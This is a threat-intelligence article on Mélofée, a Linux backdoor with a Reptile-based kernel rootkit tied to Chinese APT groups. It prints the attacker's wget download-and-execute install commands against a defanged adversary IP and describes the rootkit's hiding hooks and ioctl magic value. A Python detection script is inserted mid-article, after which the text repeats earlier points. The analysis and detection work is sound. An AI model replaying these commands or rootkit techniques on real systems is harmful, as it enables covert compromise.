Mélofée – New Linux Malware Linked to Chinese APT Groups

A new piece of malware targeted at Linux servers has been connected to an unidentified Chinese state-sponsored hacking organization.

ExaTrack, a French cybersecurity company, discovered three examples of the previously reported malicious software in early 2022 and gave it the name Mélofée.

Mélofée implant analysis

We found three samples of this malware family, which we dubbed Mélofée.

Two of these samples included a version number (20220111 and 20220308), and we assess that the last sample was likely dated from late April or May 2022.

All these samples shared a common code base, but showed a constant development in the following domains:

  • evolutions of the communication protocol and the packet format
  • change in the encryption of the configuration, using first RC4 and then a simple xor
  • the development of a SelfForwardServer functionality
  • lastly, the inclusion of a kernel mode rootkit in the last sample.


The first sample we found dropped a rootkit based on a modified version of the open source project Reptile.

According to the vermagic metadata, it is compiled for a kernel version 5.10.112-108.499.amzn2.x86_64. The rootkit has a limited set of features, mainly installing a hook designed for hiding itself.

The rootkit hooks the functions fillonedir, filldir and filldir64 in order to not display files with names containing intel_audio or rc.modules when listing a directory.


It also hooks the inet_ioctl function in order to communicate with its userland part through the ioctl system call. The kernel rootkit expects the userland component to pass the value 0xe0e0e0e as the ioctl request, and supports two commands: hide and show.

The rootkit is loaded both by the installer and server components with a call to the insmod utility.


The implant and the rootkit were installed using shell commands that download both the installer and a custom binary package from an adversary-controlled server. This behaviour is similar to the installation process of Winnti Linux rootkits.

wget http://173.209.62[.]186:8765/installer -O /var/tmp/installer
wget http://173.209.62[.]186:8765/a.dat -O /var/tmp/usbd;
chmod +x /var/tmp/installer;
/var/tmp/installer -i /var/tmp/usbd

The installer is also developed in C++, and takes the binary package as an argument. It then proceeds to extract and install both the rootkit and the server component. The rootkit and implant paths are hardcoded to /etc/intel_audio/intel_audio.ko and /etc/intel_audio/audio respectively. The installer inserts the kernel rootkit using a call to system("insmod /etc/intel_audio/intel_audio.ko"), and also installs the persistence in the /etc/rc.modules file.

Writing to this script ensures that both the kernel module and the implant are executed at boot time.
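As an added defender-side example (my own code, not ExaTrack's and not part of the original write-up), the script below turns three of the indicators described above into host triage checks: a filldir-hook discrepancy test (a hidden entry still resolves by full path even though readdir no longer returns it), a scan of /etc/rc.modules for the insmod persistence, and a filter over auditd SYSCALL records for ioctl calls carrying the 0xe0e0e0e request value. It assumes an x86_64 host (ioctl is syscall number 16 there, consistent with the amzn2 x86_64 vermagic) and auditd's SYSCALL record layout, where a0..a3 are logged as bare hex; the rc.modules content and the audit lines are constructed samples, not real captures.

```python
import os
import re
from typing import Callable, Dict, Iterable, List, Tuple

# Indicators quoted from the write-up above: the names the filldir hooks hide,
# the hardcoded install paths, and the ioctl magic the userland part sends.
HIDDEN_SUBSTRINGS = ("intel_audio", "rc.modules")
KNOWN_PATHS = ("/etc/intel_audio/intel_audio.ko", "/etc/intel_audio/audio", "/etc/rc.modules")
IOCTL_MAGIC = 0xE0E0E0E
NR_IOCTL_X86_64 = 16  # assumption: x86_64 syscall table


def check_directory(directory: str, names: Iterable[str],
                    listdir: Callable[[str], List[str]] = os.listdir,
                    exists: Callable[[str], bool] = os.path.exists) -> List[str]:
    """Names that resolve by full path but are absent from the directory listing.
    A filldir/filldir64 hook filters getdents results, yet a hidden entry can
    still be stat()ed directly; that discrepancy is the detection signal.
    listdir/exists are injectable so the check can be exercised offline."""
    listed = set(listdir(directory))
    return sorted(n for n in names
                  if exists(os.path.join(directory, n)) and n not in listed)


INSMOD_RE = re.compile(r"^\s*(?:\S*/)?(insmod|modprobe)\s+(\S+)")


def suspicious_rc_modules_lines(text: str) -> List[Dict[str, object]]:
    """Flag rc.modules lines that load a module from outside /lib/modules or
    that reference one of the names the rootkit hides."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        reasons = []
        m = INSMOD_RE.match(line)
        if m and m.group(2).startswith("/") and not m.group(2).startswith("/lib/modules/"):
            reasons.append("module loaded from outside /lib/modules")
        if any(s in line for s in HIDDEN_SUBSTRINGS):
            reasons.append("references a name the rootkit hides")
        if reasons:
            findings.append({"line": lineno, "text": line.strip(), "reasons": reasons})
    return findings


AUDIT_KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def ioctl_magic_hits(audit_lines: Iterable[str], magic: int = IOCTL_MAGIC,
                     ioctl_nr: int = NR_IOCTL_X86_64) -> List[Tuple[int, str]]:
    """(pid, exe) for auditd SYSCALL records where ioctl() was called with the
    rootkit's magic request value. a1 is the ioctl request argument; records
    for other syscalls that happen to carry the same a1 are ignored."""
    hits = []
    for line in audit_lines:
        f = {k: v.strip('"') for k, v in AUDIT_KV_RE.findall(line)}
        if f.get("type") != "SYSCALL" or f.get("syscall") != str(ioctl_nr):
            continue
        try:
            request = int(f.get("a1", ""), 16)
        except ValueError:
            continue
        if request == magic:
            hits.append((int(f.get("pid", "0")), f.get("exe", "")))
    return hits


# Constructed sample inputs (not real captures) so the script runs offline.
SAMPLE_RC_MODULES = """#!/bin/sh
# constructed sample mimicking the persistence script the installer writes
modprobe vboxdrv
insmod /etc/intel_audio/intel_audio.ko
/etc/intel_audio/audio &
"""

SAMPLE_AUDIT = [
    'type=SYSCALL msg=audit(1650000000.101:201): arch=c000003e syscall=16 success=yes exit=0 a0=3 a1=e0e0e0e a2=0 a3=0 pid=4242 comm="audio" exe="/etc/intel_audio/audio"',
    'type=SYSCALL msg=audit(1650000000.102:202): arch=c000003e syscall=16 success=yes exit=0 a0=5 a1=5401 a2=7ffd10 a3=0 pid=900 comm="bash" exe="/usr/bin/bash"',
    'type=SYSCALL msg=audit(1650000000.103:203): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=e0e0e0e a2=0 a3=0 pid=901 comm="cat" exe="/usr/bin/cat"',
]

if __name__ == "__main__":
    print("rc.modules findings:", suspicious_rc_modules_lines(SAMPLE_RC_MODULES))
    print("ioctl magic hits:", ioctl_magic_hits(SAMPLE_AUDIT))
    # Live check on this host: entries under /etc that exist but are not listed.
    print("hidden in /etc:", check_directory("/etc", ["intel_audio", "rc.modules"]))
```

The directory check is deliberately run from userland with ordinary syscalls: the hooks described above only filter directory enumeration, so a name that exists on disk but never shows up in a listing is the cheapest signal available without a kernel-side tool. On a host where the rootkit is loaded, the rc.modules scan may itself be blind if the hook hides that file; the ioctl audit check does not depend on the filesystem view at all.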

One of the artifacts is made to load a kernel-mode rootkit that is built on the Reptile open source project.

“According to the vermagic metadata, it is compiled for a kernel version 5.10.112-108.499.amzn2.x86_64,” the company said in a report. “The rootkit has a limited set of features, mainly installing a hook designed for hiding itself.”

The implant and the rootkit are reportedly delivered by shell commands that download the installer and a custom binary package from a remote server.

The installer takes the binary package as an argument and extracts both the rootkit and the server implant module from it.

Mélofée’s capabilities are typical of backdoors of its kind: it communicates with a remote server and receives instructions that let it operate on files, create sockets, run a shell, and execute arbitrary commands.

The malware’s ties to China come from infrastructure overlaps with groups such as APT41 (aka Winnti) and Earth Berberoka (aka GamblingPuppet).

Earth Berberoka is the name given to a state-sponsored actor chiefly targeting gambling websites in China since at least 2020 using multi-platform malware like HelloBot and Pupy RAT.

According to Trend Micro, some samples of the Python-based Pupy RAT have been concealed using the Reptile rootkit.


Also discovered by ExaTrack is another implant codenamed AlienReverse, which shares code similarities with Mélofée and makes use of publicly-available tools like EarthWorm and socks_proxy.

The firm claimed that the “Mélofée implant family is yet another weapon in the toolbox of Chinese state-sponsored attackers, which show constant innovation and development.”

“Despite being comparatively straightforward, Mélofée’s capabilities could allow adversaries to carry out their attacks covertly. The fact that these implants were not frequently observed indicates that the assailants are probably only using them on high-value targets.”
